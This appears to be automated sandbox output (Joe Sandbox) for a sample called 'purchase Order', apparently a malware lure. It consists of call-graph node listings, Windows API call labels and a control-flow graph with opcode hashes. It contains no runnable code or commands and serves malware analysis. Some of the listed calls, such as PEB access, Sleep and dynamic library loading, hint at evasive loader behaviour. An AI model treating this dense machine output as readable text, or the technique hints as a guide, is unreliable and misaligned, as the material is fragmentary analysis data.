96869 cb8728 96867->96869 96956 c8cc5c 86 API calls 4 library calls 96868->96956 96869->96870 96953 c8cc5c 86 API calls 4 library calls 96869->96953 96870->96865 96870->96866 96876 c4d7f7 48 API calls 96870->96876 96910 c4f229 96870->96910 96871 c4fe30 335 API calls 96871->96912 96875 cb87a3 96874->96875 96955 c60f0a 52 API calls __cinit 96875->96955 96878 cb8772 96876->96878 96877 cb8b1b 96893 cb8bcf 96877->96893 96894 cb8b2c 96877->96894 96954 c60f0a 52 API calls __cinit 96878->96954 96879 c8cc5c 86 API calls 96879->96912 96890 c4f418 96881->96890 96957 c89af1 48 API calls 96881->96957 96882 c4f770 96888 cb8a45 96882->96888 96906 c4f77a 96882->96906 96884 c4d6e9 55 API calls 96884->96912 96886 c4fe30 335 API calls 96908 c4f6aa 96886->96908 96887 cb8b7e 96966 c9e40a 335 API calls Mailbox 96887->96966 96963 c5c1af 48 API calls 96888->96963 96889 cb8c53 96971 c8cc5c 86 API calls 4 library calls 96889->96971 96890->96877 96890->96908 96890->96912 96891 cb8810 96958 c9eef8 335 API calls 96891->96958 96968 c8cc5c 86 API calls 4 library calls 96893->96968 96965 c9f5ee 335 API calls 96894->96965 96895 cb8beb 96969 c9bdbd 335 API calls Mailbox 96895->96969 96900 c4f537 Mailbox 96900->96804 96904 c51b90 48 API calls 96904->96912 96905 c51b90 48 API calls 96905->96912 96906->96904 96907 cb8c00 96907->96900 96970 c8cc5c 86 API calls 4 library calls 96907->96970 96908->96882 96908->96886 96908->96900 96909 c4fce0 96908->96909 96908->96912 96909->96900 96967 c8cc5c 86 API calls 4 library calls 96909->96967 96910->96865 96910->96866 96910->96890 96910->96912 96911 cb8823 96911->96890 96914 cb884b 96911->96914 96912->96871 96912->96879 96912->96884 96912->96887 96912->96889 96912->96895 96912->96900 96912->96905 96912->96909 96952 c4dd47 48 API calls ___crtGetEnvironmentStringsW 96912->96952 96964 c797ed InterlockedDecrement 96912->96964 96972 c5c1af 48 API calls 96912->96972 96959 c9ccdc 48 API calls 96914->96959 96919 cb8857 96920 cb8865 96919->96920 96921 cb88aa 96919->96921 96960 c89b72 48 API calls 96920->96960 96924 cb88a0 Mailbox 96921->96924 96961 c8a69d 48 API calls 96921->96961 96922 c4fe30 335 API calls 96922->96900 96924->96922 96926 cb88e7 96962 c4bc74 48 API calls 96926->96962 96929 c5e253 96928->96929 96931 cbdf42 96928->96931 96929->96804 96930 cbdf77 96931->96930 96932 cbdf59 TranslateAcceleratorW 96931->96932 96932->96929 96934 c5dc71 96933->96934 96935 c5dca3 96933->96935 96934->96935 96936 c5dc96 IsDialogMessageW 96934->96936 96937 cbdd1d GetClassLongW 96934->96937 96935->96804 96936->96934 96936->96935 96937->96934 96937->96936 96938->96804 96939->96784 96940->96777 96941->96782 96942->96804 96943->96804 96944->96818 96945->96818 96946->96818 96947->96818 96948->96818 96949->96818 96950->96860 96951->96862 96952->96912 96953->96870 96954->96910 96955->96912 96956->96900 96957->96891 96958->96911 96959->96919 96960->96924 96961->96926 96962->96924 96963->96912 96964->96912 96965->96912 96966->96909 96967->96900 96968->96900 96969->96907 96970->96900 96971->96900 96972->96912 96973 c8bb64 96974 c8bb71 96973->96974 96977 c8bb77 96973->96977 96975 c61c9d _free 47 API calls 96974->96975 96975->96977 96976 c8bb88 96979 c8bb9a 96976->96979 96980 c61c9d _free 47 API calls 96976->96980 96977->96976 96978 c61c9d _free 47 API calls 96977->96978 96978->96976 96980->96979 96981 cb9c06 96992 c5d3be 96981->96992 96983 cb9c1c 96984 cb9c91 Mailbox 96983->96984 97001 c41caa 49 API calls 96983->97001 96987 c53200 335 API calls 96984->96987 96986 cb9c71 96990 cb9cc5 96986->96990 97002 c8b171 48 API calls 96986->97002 96987->96990 96989 cba7ab Mailbox 96990->96989 97003 c8cc5c 86 API calls 4 library calls 96990->97003 96993 c5d3dc 96992->96993 96994 c5d3ca 96992->96994 96996 c5d3e2 96993->96996 96997 c5d40b 96993->96997 97004 c4dcae 50 API calls Mailbox 96994->97004 96999 c5f4ea 48 API calls 96996->96999 97005 c4dcae 50 API calls Mailbox 96997->97005 96998 c5d3d4 96998->96983 96999->96998 97001->96986 97002->96984 97003->96989 97004->96998 97005->96998 97006 cb197b 97011 c5dd94 97006->97011 97010 cb198a 97012 c5f4ea 48 API calls 97011->97012 97013 c5dd9c 97012->97013 97014 c5ddb0 97013->97014 97019 c5df3d 97013->97019 97018 c60f0a 52 API calls __cinit 97014->97018 97018->97010 97020 c5df46 97019->97020 97021 c5dda8 97019->97021 97051 c60f0a 52 API calls __cinit 97020->97051 97023 c5ddc0 97021->97023 97024 c4d7f7 48 API calls 97023->97024 97025 c5ddd7 GetVersionExW 97024->97025 97026 c46a63 48 API calls 97025->97026 97027 c5de1a 97026->97027 97052 c5dfb4 97027->97052 97032 cb24c8 97035 c5dea4 GetCurrentProcess 97069 c5df5f LoadLibraryA GetProcAddress 97035->97069 97036 c5debb 97038 c5df31 GetSystemInfo 97036->97038 97039 c5dee3 97036->97039 97040 c5df0e 97038->97040 97063 c5e00c 97039->97063 97042 c5df21 97040->97042 97043 c5df1c FreeLibrary 97040->97043 97042->97014 97043->97042 97045 c5df29 GetSystemInfo 97048 c5df03 97045->97048 97046 c5def9 97066 c5dff4 97046->97066 97048->97040 97050 c5df09 FreeLibrary 97048->97050 97050->97040 97051->97021 97053 c5dfbd 97052->97053 97054 c4b18b 48 API calls 97053->97054 97055 c5de22 97054->97055 97056 c46571 97055->97056 97057 c4657f 97056->97057 97058 c4b18b 48 API calls 97057->97058 97059 c4658f 97058->97059 97059->97032 97060 c5df77 97059->97060 97070 c5df89 97060->97070 97074 c5e01e 97063->97074 97067 c5e00c 2 API calls 97066->97067 97068 c5df01 GetNativeSystemInfo 97067->97068 97068->97048 97069->97036 97071 c5dea0 97070->97071 97072 c5df92 LoadLibraryA 97070->97072 97071->97035 97071->97036 97072->97071 97073 c5dfa3 GetProcAddress 97072->97073 97073->97071 97075 c5def1 97074->97075 97076 c5e027 LoadLibraryA 97074->97076 97075->97045 97075->97046 97076->97075 97077 c5e038 GetProcAddress 97076->97077 97077->97075 97078 cb19ba 97083 c5c75a 97078->97083 97082 cb19c9 97084 c4d7f7 48 API calls 97083->97084 97085 c5c7c8 97084->97085 97091 c5d26c 97085->97091 97088 c5c865 97089 c5c881 97088->97089 97094 c5d1fa 48 API calls ___crtGetEnvironmentStringsW 97088->97094 97090 c60f0a 52 API calls __cinit 97089->97090 97090->97082 97095 c5d298 97091->97095 97094->97088 97096 c5d28b 97095->97096 97097 c5d2a5 97095->97097 97096->97088 97097->97096 97098 c5d2ac RegOpenKeyExW 97097->97098 97098->97096 97099 c5d2c6 RegQueryValueExW 97098->97099 97100 c5d2e7 97099->97100 97101 c5d2fc RegCloseKey 97099->97101 97100->97101 97101->97096 97102 cb8eb8 97106 c8a635 97102->97106 97104 cb8ec3 97105 c8a635 84 API calls 97104->97105 97105->97104 97107 c8a642 97106->97107 97116 c8a66f 97106->97116 97108 c8a671 97107->97108 97110 c8a676 97107->97110 97114 c8a669 97107->97114 97107->97116 97118 c5ec4e 81 API calls 97108->97118 97111 c4936c 81 API calls 97110->97111 97112 c8a67d 97111->97112 97113 c4510d 48 API calls 97112->97113 97113->97116 97117 c54525 61 API calls ___crtGetEnvironmentStringsW 97114->97117 97116->97104 97117->97116 97118->97110 97119 17cd208 97133 17cae58 97119->97133 97121 17cd2c1 97136 17cd0f8 97121->97136 97139 17ce2e8 GetPEB 97133->97139 97135 17cb4e3 97135->97121 97137 17cd101 Sleep 97136->97137 97138 17cd10f 97137->97138 97140 17ce312 97139->97140 97140->97135 97141 c4b7b1 97150 c4c62c 97141->97150 97143 c4b7ec 97160 c4ba85 48 API calls ___crtGetEnvironmentStringsW 97143->97160 97144 c4b7c2 97144->97143 97158 c4bc74 48 API calls 97144->97158 97147 c4b7e0 97159 c4ba85 48 API calls ___crtGetEnvironmentStringsW 97147->97159 97149 c4b6b7 Mailbox 97161 c4bcce 97150->97161 97152 cb39fd 97167 c826bc 88 API calls 4 library calls 97152->97167 97154 c4c63b 97154->97152 97155 c4c68b 97154->97155 97157 c4c799 48 API calls 97154->97157 97155->97144 97156 cb3a0b 97157->97154 97158->97147 97159->97143 97160->97149 97162 c4bce8 97161->97162 97163 c4bcdb 97161->97163 97164 c5f4ea 48 API calls 97162->97164 97163->97154 97165 c4bcf2 97164->97165 97166 c5ee75 48 API calls 97165->97166 97166->97163 97167->97156 97168 cb19dd 97173 c44a30 97168->97173 97170 cb19f1 97193 c60f0a 52 API calls __cinit 97170->97193 97172 cb19fb 97174 c44a40 __ftell_nolock 97173->97174 97175 c4d7f7 48 API calls 97174->97175 97176 c44af6 97175->97176 97194 c45374 97176->97194 97178 c44aff 97201 c4363c 97178->97201 97181 c4518c 48 API calls 97182 c44b18 97181->97182 97207 c464cf 97182->97207 97185 c4d7f7 48 API calls 97186 c44b32 97185->97186 97213 c449fb 97186->97213 97188 c44b43 Mailbox 97188->97170 97189 c461a6 48 API calls 97192 c44b3d _wcscat Mailbox __wsetenvp 97189->97192 97190 c4ce19 48 API calls 97190->97192 97191 c464cf 48 API calls 97191->97192 97192->97188 97192->97189 97192->97190 97192->97191 97193->97172 97227 c6f8a0 97194->97227 97197 c4ce19 48 API calls 97198 c453a7 97197->97198 97229 c4660f 97198->97229 97200 c453b1 Mailbox 97200->97178 97202 c43649 __ftell_nolock 97201->97202 97236 c4366c GetFullPathNameW 97202->97236 97204 c4365a 97205 c46a63 48 API calls 97204->97205 97206 c43669 97205->97206 97206->97181 97208 c4651b 97207->97208 97212 c464dd ___crtGetEnvironmentStringsW 97207->97212 97211 c5f4ea 48 API calls 97208->97211 97209 c5f4ea 48 API calls 97210 c44b29 97209->97210 97210->97185 97211->97212 97212->97209 97214 c4bcce 48 API calls 97213->97214 97215 c44a0a RegOpenKeyExW 97214->97215 97216 cb41cc RegQueryValueExW 97215->97216 97217 c44a2b 97215->97217 97218 cb4246 RegCloseKey 97216->97218 97219 cb41e5 97216->97219 97217->97192 97220 c5f4ea 48 API calls 97219->97220 97221 cb41fe 97220->97221 97222 c447b7 48 API calls 97221->97222 97223 cb4208 RegQueryValueExW 97222->97223 97224 cb4224 97223->97224 97226 cb423b 97223->97226 97225 c46a63 48 API calls 97224->97225 97225->97226 97226->97218 97228 c45381 GetModuleFileNameW 97227->97228 97228->97197 97230 c6f8a0 __ftell_nolock 97229->97230 97231 c4661c GetFullPathNameW 97230->97231 97232 c46a63 48 API calls 97231->97232 97233 c46643 97232->97233 97234 c46571 48 API calls 97233->97234 97235 c4664f 97234->97235 97235->97200 97237 c4368a 97236->97237 97237->97204 97238 c65dfd 97239 c65e09 __setmbcp 97238->97239 97275 c67eeb GetStartupInfoW 97239->97275 97242 c65e66 97244 c65e71 97242->97244 97362 c65f4d 47 API calls 3 library calls 97242->97362 97243 c65e0e 97277 c69ca7 GetProcessHeap 97243->97277 97278 c67b47 97244->97278 97247 c65e77 97248 c65e82 __RTC_Initialize 97247->97248 97363 c65f4d 47 API calls 3 library calls 97247->97363 97299 c6acb3 97248->97299 97251 c65e91 97252 c65e9d GetCommandLineW 97251->97252 97364 c65f4d 47 API calls 3 library calls 97251->97364 97318 c72e7d GetEnvironmentStringsW 97252->97318 97255 c65e9c 97255->97252 97259 c65ec2 97331 c72cb4 97259->97331 97262 c65ec8 97263 c65ed3 97262->97263 97366 c6115b 47 API calls 3 library calls 97262->97366 97345 c61195 97263->97345 97266 c65edb 97267 c65ee6 __wwincmdln 97266->97267 97367 c6115b 47 API calls 3 library calls 97266->97367 97349 c43a0f 97267->97349 97270 c65efa 97271 c65f09 97270->97271 97368 c613f1 47 API calls _doexit 97270->97368 97369 c61186 47 API calls _doexit 97271->97369 97274 c65f0e __setmbcp 97276 c67f01 97275->97276 97276->97243 97277->97242 97370 c6123a 30 API calls 2 library calls 97278->97370 97280 c67b4c 97371 c67e23 InitializeCriticalSectionAndSpinCount 97280->97371 97282 c67b51 97283 c67b55 97282->97283 97373 c67e6d TlsAlloc 97282->97373 97372 c67bbd 50 API calls 2 library calls 97283->97372 97286 c67b5a 97286->97247 97287 c67b67 97287->97283 97288 c67b72 97287->97288 97374 c66986 97288->97374 97291 c67bb4 97382 c67bbd 50 API calls 2 library calls 97291->97382 97294 c67b93 97294->97291 97296 c67b99 97294->97296 97295 c67bb9 97295->97247 97381 c67a94 47 API calls 4 library calls 97296->97381 97298 c67ba1 GetCurrentThreadId 97298->97247 97300 c6acbf __setmbcp 97299->97300 97301 c67cf4 __lock 47 API calls 97300->97301 97302 c6acc6 97301->97302 97303 c66986 __calloc_crt 47 API calls 97302->97303 97305 c6acd7 97303->97305 97304 c6ad42 GetStartupInfoW 97312 c6ae80 97304->97312 97315 c6ad57 97304->97315 97305->97304 97306 c6ace2 @_EH4_CallFilterFunc@8 __setmbcp 97305->97306 97306->97251 97307 c6af44 97391 c6af58 LeaveCriticalSection _doexit 97307->97391 97309 c6aec9 GetStdHandle 97309->97312 97310 c66986 __calloc_crt 47 API calls 97310->97315 97311 c6aedb GetFileType 97311->97312 97312->97307 97312->97309 97312->97311 97314 c6af08 InitializeCriticalSectionAndSpinCount 97312->97314 97313 c6ada5 97313->97312 97316 c6add7 GetFileType 97313->97316 97317 c6ade5 InitializeCriticalSectionAndSpinCount 97313->97317 97314->97312 97315->97310 97315->97312 97315->97313 97316->97313 97316->97317 97317->97313 97319 c65ead 97318->97319 97320 c72e8e 97318->97320 97325 c72a7b GetModuleFileNameW 97319->97325 97392 c669d0 47 API calls __crtCompareStringA_stat 97320->97392 97323 c72eb4 ___crtGetEnvironmentStringsW 97324 c72eca FreeEnvironmentStringsW 97323->97324 97324->97319 97326 c72aaf _wparse_cmdline 97325->97326 97327 c65eb7 97326->97327 97328 c72ae9 97326->97328 97327->97259 97365 c6115b 47 API calls 3 library calls 97327->97365 97393 c669d0 47 API calls __crtCompareStringA_stat 97328->97393 97330 c72aef _wparse_cmdline 97330->97327 97332 c72ccd __wsetenvp 97331->97332 97333 c72cc5 97331->97333 97334 c66986 __calloc_crt 47 API calls 97332->97334 97333->97262 97341 c72cf6 __wsetenvp 97334->97341 97335 c72d4d 97336 c61c9d _free 47 API calls 97335->97336 97336->97333 97337 c66986 __calloc_crt 47 API calls 97337->97341 97338 c72d72 97339 c61c9d _free 47 API calls 97338->97339 97339->97333 97341->97333 97341->97335 97341->97337 97341->97338 97342 c72d89 97341->97342 97394 c72567 47 API calls __wopenfile 97341->97394 97395 c66e20 IsProcessorFeaturePresent 97342->97395 97344 c72d95 97344->97262 97346 c611a1 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 97345->97346 97348 c611e0 __IsNonwritableInCurrentImage 97346->97348 97410 c60f0a 52 API calls __cinit 97346->97410 97348->97266 97350 cb1ebf 97349->97350 97351 c43a29 97349->97351 97352 c43a63 IsThemeActive 97351->97352 97411 c61405 97352->97411 97356 c43a8f 97423 c43adb SystemParametersInfoW SystemParametersInfoW 97356->97423 97358 c43a9b 97424 c43d19 97358->97424 97360 c43aa3 SystemParametersInfoW 97361 c43ac8 97360->97361 97361->97270 97362->97244 97363->97248 97364->97255 97368->97271 97369->97274 97370->97280 97371->97282 97372->97286 97373->97287 97376 c6698d 97374->97376 97377 c669ca 97376->97377 97378 c669ab Sleep 97376->97378 97383 c730aa 97376->97383 97377->97291 97380 c67ec9 TlsSetValue 97377->97380 97379 c669c2 97378->97379 97379->97376 97379->97377 97380->97294 97381->97298 97382->97295 97384 c730b5 97383->97384 97385 c730d0 __calloc_impl 97383->97385 97384->97385 97386 c730c1 97384->97386 97388 c730e0 RtlAllocateHeap 97385->97388 97389 c730c6 97385->97389 97390 c67c0e 47 API calls __getptd_noexit 97386->97390 97388->97385 97388->97389 97389->97376 97390->97389 97391->97306 97392->97323 97393->97330 97394->97341 97396 c66e2b 97395->97396 97401 c66cb5 97396->97401 97400 c66e46 97400->97344 97402 c66ccf _memset ___raise_securityfailure 97401->97402 97403 c66cef IsDebuggerPresent 97402->97403 97409 c681ac SetUnhandledExceptionFilter UnhandledExceptionFilter 97403->97409 97405 c6a70c __ld12tod 6 API calls 97407 c66dd6 97405->97407 97406 c66db3 ___raise_securityfailure 97406->97405 97408 c68197 GetCurrentProcess TerminateProcess 97407->97408 97408->97400 97409->97406 97410->97348 97412 c67cf4 __lock 47 API calls 97411->97412 97413 c61410 97412->97413 97476 c67e58 LeaveCriticalSection 97413->97476 97415 c43a88 97416 c6146d 97415->97416 97417 c61477 97416->97417 97418 c61491 97416->97418 97417->97418 97477 c67c0e 47 API calls __getptd_noexit 97417->97477 97418->97356 97420 c61481 97478 c66e10 8 API calls __wopenfile 97420->97478 97422 c6148c 97422->97356 97423->97358 97425 c43d26 __ftell_nolock 97424->97425 97426 c4d7f7 48 API calls 97425->97426 97427 c43d31 GetCurrentDirectoryW 97426->97427 97479 c461ca 97427->97479 97429 c43d57 IsDebuggerPresent 97430 c43d65 97429->97430 97431 cb1cc1 MessageBoxA 97429->97431 97433 cb1cd9 97430->97433 97434 c43d82 97430->97434 97462 c43e3a 97430->97462 97431->97433 97432 c43e41 SetCurrentDirectoryW 97438 c43e4e Mailbox 97432->97438 97594 c5c682 48 API calls 97433->97594 97553 c440e5 97434->97553 97438->97360 97439 cb1ce9 97443 cb1cff SetCurrentDirectoryW 97439->97443 97443->97438 97462->97432 97476->97415 97477->97420 97478->97422 97596 c5e99b 97479->97596 97483 c461eb 97484 c45374 50 API calls 97483->97484 97485 c461ff 97484->97485 97486 c4ce19 48 API calls 97485->97486 97487 c4620c 97486->97487 97613 c439db 97487->97613 97489 c46216 Mailbox 97490 c46eed 48 API calls 97489->97490 97491 c4622b 97490->97491 97625 c49048 97491->97625 97494 c4ce19 48 API calls 97495 c46244 97494->97495 97496 c4d6e9 55 API calls 97495->97496 97497 c46254 Mailbox 97496->97497 97498 c4ce19 48 API calls 97497->97498 97499 c4627c 97498->97499 97500 c4d6e9 55 API calls 97499->97500 97501 c4628f Mailbox 97500->97501 97502 c4ce19 48 API calls 97501->97502 97503 c462a0 97502->97503 97504 c4d645 53 API calls 97503->97504 97505 c462b2 Mailbox 97504->97505 97506 c4d7f7 48 API calls 97505->97506 97507 c462c5 97506->97507 97628 c463fc 97507->97628 97511 c462df 97512 cb1c08 97511->97512 97513 c462e9 97511->97513 97514 c463fc 48 API calls 97512->97514 97515 c60fa7 _W_store_winword 59 API calls 97513->97515 97517 cb1c1c 97514->97517 97516 c462f4 97515->97516 97516->97517 97518 c462fe 97516->97518 97520 c463fc 48 API calls 97517->97520 97519 c60fa7 _W_store_winword 59 API calls 97518->97519 97521 c46309 97519->97521 97522 cb1c38 97520->97522 97521->97522 97523 c46313 97521->97523 97525 c45374 50 API calls 97522->97525 97524 c60fa7 _W_store_winword 59 API calls 97523->97524 97527 c4631e 97524->97527 97526 cb1c5d 97525->97526 97528 c463fc 48 API calls 97526->97528 97529 c4635f 97527->97529 97531 cb1c86 97527->97531 97534 c463fc 48 API calls 97527->97534 97530 cb1c69 97528->97530 97529->97531 97532 c4636c 97529->97532 97533 c46eed 48 API calls 97530->97533 97535 c46eed 48 API calls 97531->97535 97536 c5c050 48 API calls 97532->97536 97537 cb1c77 97533->97537 97538 c46342 97534->97538 97539 cb1ca8 97535->97539 97540 c46384 97536->97540 97541 c463fc 48 API calls 97537->97541 97542 c46eed 48 API calls 97538->97542 97543 c463fc 48 API calls 97539->97543 97544 c51b90 48 API calls 97540->97544 97541->97531 97545 c46350 97542->97545 97546 cb1cb5 97543->97546 97549 c46394 97544->97549 97547 c463fc 48 API calls 97545->97547 97546->97546 97547->97529 97548 c463d6 Mailbox 97548->97429 97549->97548 97550 c51b90 48 API calls 97549->97550 97552 c463fc 48 API calls 97549->97552 97644 c46b68 48 API calls 97549->97644 97550->97549 97552->97549 97554 c440f2 __ftell_nolock 97553->97554 97555 cb370e _memset 97554->97555 97556 c4410b 97554->97556 97558 cb372a GetOpenFileNameW 97555->97558 97557 c4660f 49 API calls 97556->97557 97559 c44114 97557->97559 97560 cb3779 97558->97560 97687 c440a7 97559->97687 97562 c46a63 48 API calls 97560->97562 97564 cb378e 97562->97564 97564->97564 97594->97439 97597 c4d7f7 48 API calls 97596->97597 97598 c461db 97597->97598 97599 c46009 97598->97599 97600 c46016 __ftell_nolock 97599->97600 97601 c46a63 48 API calls 97600->97601 97606 c4617c Mailbox 97600->97606 97603 c46048 97601->97603 97612 c4607e Mailbox 97603->97612 97645 c461a6 97603->97645 97604 c461a6 48 API calls 97604->97612 97605 c4614f 97605->97606 97607 c4ce19 48 API calls 97605->97607 97606->97483 97609 c46170 97607->97609 97608 c4ce19 48 API calls 97608->97612 97610 c464cf 48 API calls 97609->97610 97610->97606 97611 c464cf 48 API calls 97611->97612 97612->97604 97612->97605 97612->97606 97612->97608 97612->97611 97614 c441a9 136 API calls 97613->97614 97615 c439fe 97614->97615 97616 c43a06 97615->97616 97648 c8c396 97615->97648 97616->97489 97619 cb2ff0 97621 c61c9d _free 47 API calls 97619->97621 97620 c44252 84 API calls 97620->97619 97622 cb2ffd 97621->97622 97623 c44252 84 API calls 97622->97623 97624 cb3006 97623->97624 97624->97624 97626 c5f4ea 48 API calls 97625->97626 97627 c46237 97626->97627 97627->97494 97629 c46406 97628->97629 97630 c4641f 97628->97630 97632 c46eed 48 API calls 97629->97632 97631 c46a63 48 API calls 97630->97631 97633 c462d1 97631->97633 97632->97633 97634 c60fa7 97633->97634 97635 c60fb3 97634->97635 97636 c61028 97634->97636 97643 c60fd8 97635->97643 97684 c67c0e 47 API calls __getptd_noexit 97635->97684 97686 c6103a 59 API calls 3 library calls 97636->97686 97639 c61035 97639->97511 97640 c60fbf 97685 c66e10 8 API calls __wopenfile 97640->97685 97642 c60fca 97642->97511 97643->97511 97644->97549 97646 c4bdfa 48 API calls 97645->97646 97647 c461b1 97646->97647 97647->97603 97649 c44517 83 API calls 97648->97649 97650 c8c405 97649->97650 97651 c8c56d 94 API calls 97650->97651 97652 c8c417 97651->97652 97653 c444ed 64 API calls 97652->97653 97681 c8c41b 97652->97681 97654 c8c432 97653->97654 97655 c444ed 64 API calls 97654->97655 97656 c8c442 97655->97656 97657 c444ed 64 API calls 97656->97657 97658 c8c45d 97657->97658 97659 c444ed 64 API calls 97658->97659 97660 c8c478 97659->97660 97661 c44517 83 API calls 97660->97661 97662 c8c48f 97661->97662 97663 c6395c __crtCompareStringA_stat 47 API calls 97662->97663 97664 c8c496 97663->97664 97665 c6395c __crtCompareStringA_stat 47 API calls 97664->97665 97666 c8c4a0 97665->97666 97667 c444ed 64 API calls 97666->97667 97668 c8c4b4 97667->97668 97669 c8bf5a GetSystemTimeAsFileTime 97668->97669 97670 c8c4c7 97669->97670 97671 c8c4dc 97670->97671 97672 c8c4f1 97670->97672 97673 c61c9d _free 47 API calls 97671->97673 97674 c8c556 97672->97674 97675 c8c4f7 97672->97675 97676 c8c4e2 97673->97676 97678 c61c9d _free 47 API calls 97674->97678 97683 c8b965 118 API calls __fcloseall 97675->97683 97679 c61c9d _free 47 API calls 97676->97679 97678->97681 97679->97681 97680 c8c54e 97682 c61c9d _free 47 API calls 97680->97682 97681->97619 97681->97620 97682->97681 97683->97680 97684->97640 97685->97642 97686->97639 97688 c6f8a0 __ftell_nolock 97687->97688 97689 c440b4 GetLongPathNameW 97688->97689 97690 c46a63 48 API calls 97689->97690 97691 c440dc 97690->97691 97692 c449a0 97691->97692 97693 c4d7f7 48 API calls 97692->97693 97694 c449b2 97693->97694 97695 c4660f 49 API calls 97694->97695 97696 c449bd 97695->97696 97697 c449c8 97696->97697 97698 cb2e35 97696->97698

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 643 c6b043-c6b080 call c6f8a0 646 c6b082-c6b084 643->646 647 c6b089-c6b08b 643->647 648 c6b860-c6b86c call c6a70c 646->648 649 c6b0ac-c6b0d9 647->649 650 c6b08d-c6b0a7 call c67bda call c67c0e call c66e10 647->650 651 c6b0e0-c6b0e7 649->651 652 c6b0db-c6b0de 649->652 650->648 656 c6b105 651->656 657 c6b0e9-c6b100 call c67bda call c67c0e call c66e10 651->657 652->651 655 c6b10b-c6b110 652->655 661 c6b112-c6b11c call c6f82f 655->661 662 c6b11f-c6b12d call c73bf2 655->662 656->655 691 c6b851-c6b854 657->691 661->662 672 c6b133-c6b145 662->672 673 c6b44b-c6b45d 662->673 672->673 676 c6b14b-c6b183 call c67a0d GetConsoleMode 672->676 677 c6b463-c6b473 673->677 678 c6b7b8-c6b7d5 WriteFile 673->678 676->673 696 c6b189-c6b18f 676->696 681 c6b55a-c6b55f 677->681 682 c6b479-c6b484 677->682 684 c6b7d7-c6b7df 678->684 685 c6b7e1-c6b7e7 GetLastError 678->685 686 c6b565-c6b56e 681->686 687 c6b663-c6b66e 681->687 689 c6b48a-c6b49a 682->689 690 c6b81b-c6b833 682->690 692 c6b7e9 684->692 685->692 686->690 694 c6b574 686->694 687->690 700 c6b674 687->700 697 c6b4a0-c6b4a3 689->697 698 c6b835-c6b838 690->698 699 c6b83e-c6b84e call c67c0e call c67bda 690->699 695 c6b85e-c6b85f 691->695 693 c6b7ef-c6b7f1 692->693 701 c6b856-c6b85c 693->701 702 c6b7f3-c6b7f5 693->702 703 c6b57e-c6b595 694->703 695->648 704 c6b191-c6b193 696->704 705 c6b199-c6b1bc GetConsoleCP 696->705 706 c6b4a5-c6b4be 697->706 707 c6b4e9-c6b520 WriteFile 697->707 698->699 708 c6b83a-c6b83c 698->708 699->691 709 c6b67e-c6b693 700->709 701->695 702->690 712 c6b7f7-c6b7fc 702->712 713 c6b59b-c6b59e 703->713 704->673 704->705 714 c6b1c2-c6b1ca 705->714 715 c6b440-c6b446 705->715 716 c6b4c0-c6b4ca 706->716 717 c6b4cb-c6b4e7 706->717 707->685 718 c6b526-c6b538 707->718 708->695 719 c6b699-c6b69b 709->719 723 c6b812-c6b819 call c67bed 712->723 724 c6b7fe-c6b810 call c67c0e call c67bda 712->724 725 c6b5a0-c6b5b6 713->725 726 c6b5de-c6b627 WriteFile 713->726 727 c6b1d4-c6b1d6 714->727 715->702 716->717 717->697 717->707 718->693 728 c6b53e-c6b54f 718->728 720 c6b69d-c6b6b3 719->720 721 c6b6d8-c6b719 WideCharToMultiByte 719->721 729 c6b6c7-c6b6d6 720->729 730 c6b6b5-c6b6c4 720->730 721->685 732 c6b71f-c6b721 721->732 723->691 724->691 734 c6b5cd-c6b5dc 725->734 735 c6b5b8-c6b5ca 725->735 726->685 737 c6b62d-c6b645 726->737 738 c6b1dc-c6b1fe 727->738 739 c6b36b-c6b36e 727->739 728->689 740 c6b555 728->740 729->719 729->721 730->729 743 c6b727-c6b75a WriteFile 732->743 734->713 734->726 735->734 737->693 746 c6b64b-c6b658 737->746 747 c6b217-c6b223 call c61688 738->747 748 c6b200-c6b215 738->748 741 c6b375-c6b3a2 739->741 742 c6b370-c6b373 739->742 740->693 749 c6b3a8-c6b3ab 741->749 742->741 742->749 750 c6b75c-c6b776 743->750 751 c6b77a-c6b78e GetLastError 743->751 746->703 753 c6b65e 746->753 763 c6b225-c6b239 747->763 764 c6b269-c6b26b 747->764 754 c6b271-c6b283 call c740f7 748->754 756 c6b3b2-c6b3c5 call c75884 749->756 757 c6b3ad-c6b3b0 749->757 750->743 758 c6b778 750->758 761 c6b794-c6b796 751->761 753->693 773 c6b435-c6b43b 754->773 774 c6b289 754->774 756->685 777 c6b3cb-c6b3d5 756->777 757->756 765 c6b407-c6b40a 757->765 758->761 761->692 768 c6b798-c6b7b0 761->768 770 c6b412-c6b42d 763->770 771 c6b23f-c6b254 call c740f7 763->771 764->754 765->727 769 c6b410 765->769 768->709 775 c6b7b6 768->775 769->773 770->773 771->773 783 c6b25a-c6b267 771->783 773->692 778 c6b28f-c6b2c4 WideCharToMultiByte 774->778 775->693 780 c6b3d7-c6b3ee call c75884 777->780 781 c6b3fb-c6b401 777->781 778->773 782 c6b2ca-c6b2f0 WriteFile 778->782 780->685 788 c6b3f4-c6b3f5 780->788 781->765 782->685 785 c6b2f6-c6b30e 782->785 783->778 785->773 787 c6b314-c6b31b 785->787 787->781 789 c6b321-c6b34c WriteFile 787->789 788->781 789->685 790 c6b352-c6b359 789->790 790->773 791 c6b35f-c6b366 790->791 791->781
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1396572024.0000000000C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                        • Associated: 00000000.00000002.1396541768.0000000000C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CCD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396631334.0000000000CEE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396679078.0000000000CFA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1396696509.0000000000D04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c40000_purchase Order.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a2c28b6218325dd8599e1bcabfda455f38de994dc5d59520c51fe7b97d2f4de2
                                                        • Instruction ID: 764a69bc2b8ca1df0c86846a980b03cd397d994a8f1e828e8dee84056ea78529
                                                        • Opcode Fuzzy Hash: a2c28b6218325dd8599e1bcabfda455f38de994dc5d59520c51fe7b97d2f4de2
